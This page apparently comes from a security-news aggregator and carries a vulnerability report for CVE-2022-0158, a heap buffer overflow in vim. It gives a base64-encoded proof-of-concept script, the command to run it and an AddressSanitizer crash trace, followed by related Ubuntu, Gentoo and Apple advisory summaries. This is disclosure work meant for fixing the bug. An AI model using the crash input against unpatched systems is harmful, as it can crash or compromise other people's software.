Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-0158: Heap-based Buffer Overflow in vim

vim is vulnerable to Heap-based Buffer Overflow

CVE
#buffer_overflow

Description

A Heap-based Buffer Overflow has been found in vim commit 2f0936c

Proof of Concept

base64 poc
ZGVmIEZpcnN0RnVuY3Rpb24oKQogIGRlZiBTZWNvbmRGdW5vbmUKJCAgCiAgIGVuZGRCQkJCCmVu
ZGRlZgojIEN/////bGUgYWxsZWZ8QkJCQgplbmRkZWYKIyBDb21waWxlIGFsbCBmdW5jdGlvbnMK
ZGVmY29tcGlsZQo=


~/fuzzing/vim/fuzz/bin/vim  -u NONE -X -Z -e -s -S ./poc -c :qa!

ASan stack trace:

~/fuzzing/vim/fuzz/bin/vim  -u NONE -X -Z -e -s -S ./poc -c :qa!
=================================================================
==836524==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000622f at pc 0x0000004306f9 bp 0x7ffc883006f0 sp 0x7ffc882ffeb0
READ of size 5 at 0x60200000622f thread T0
    #0 0x4306f8 in strlen (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x4306f8)
    #1 0xc444a6  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xc444a6)
    #2 0xf7515a  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xf7515a)
    #3 0xe1ba91  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe1ba91)
    #4 0xe14ca4  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe14ca4)
    #5 0xe14009  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe14009)
    #6 0xe12ddf  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe12ddf)
    #7 0xe12043  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe12043)
    #8 0xe0e863  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe0e863)
    #9 0xe0ffaa  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe0ffaa)
    #10 0xdaf709  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xdaf709)
    #11 0xdc68ed  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xdc68ed)
    #12 0xd92167  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xd92167)
    #13 0x6e68fe  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x6e68fe)
    #14 0x6d9b41  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x6d9b41)
    #15 0xb6680a  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xb6680a)
    #16 0xb6457f  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xb6457f)
    #17 0x6e68fe  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x6e68fe)
    #18 0x6d9b41  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x6d9b41)
    #19 0xf60f43  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xf60f43)
    #20 0xf5d76f  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xf5d76f)
    #21 0x7f0d3f15a0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #22 0x41dacd  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x41dacd)

0x60200000622f is located 1 bytes to the left of 4-byte region [0x602000006230,0x602000006234)
allocated by thread T0 here:
    #0 0x49620d in malloc (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x49620d)
    #1 0x4c5d15  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x4c5d15)

SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x4306f8) in strlen
Shadow bytes around the buggy address:
  0x0c047fff8bf0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
  0x0c047fff8c00: fa fa fd fa fa fa 00 00 fa fa 00 00 fa fa 06 fa
  0x0c047fff8c10: fa fa 00 01 fa fa fd fd fa fa fd fd fa fa 04 fa
  0x0c047fff8c20: fa fa 00 04 fa fa fd fd fa fa 00 03 fa fa fd fd
  0x0c047fff8c30: fa fa 00 03 fa fa fd fd fa fa 00 03 fa fa 00 06
=>0x0c047fff8c40: fa fa 00 05 fa[fa]04 fa fa fa fa fa fa fa fa fa
  0x0c047fff8c50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8c60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8c70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==836524==ABORTING

Related news

Ubuntu Security Notice USN-6195-1

Ubuntu Security Notice 6195-1 - It was discovered that Vim contained an out-of-bounds read vulnerability. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code. It was discovered that Vim did not properly manage memory when freeing allocated memory. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code. It was discovered that Vim contained a heap-based buffer overflow vulnerability. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code.

CVE-2022-32811: About the security content of macOS Big Sur 11.6.8

A memory corruption vulnerability was addressed with improved locking. This issue is fixed in macOS Monterey 12.5, macOS Big Sur 11.6.8, Security Update 2022-005 Catalina. An app may be able to execute arbitrary code with kernel privileges.

Gentoo Linux Security Advisory 202208-32

Gentoo Linux Security Advisory 202208-32 - Multiple vulnerabilities have been discovered in Vim, the worst of which could result in denial of service. Versions less than 9.0.0060 are affected.

Apple Security Advisory 2022-07-20-3

Apple Security Advisory 2022-07-20-3 - macOS Big Sur 11.6.8 addresses code execution, information leakage, null pointer, out of bounds read, and out of bounds write vulnerabilities.

CVE-2022-22665: About the security content of macOS Monterey 12.3

A logic issue was addressed with improved validation. This issue is fixed in macOS Monterey 12.3. A malicious application may be able to gain root privileges.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907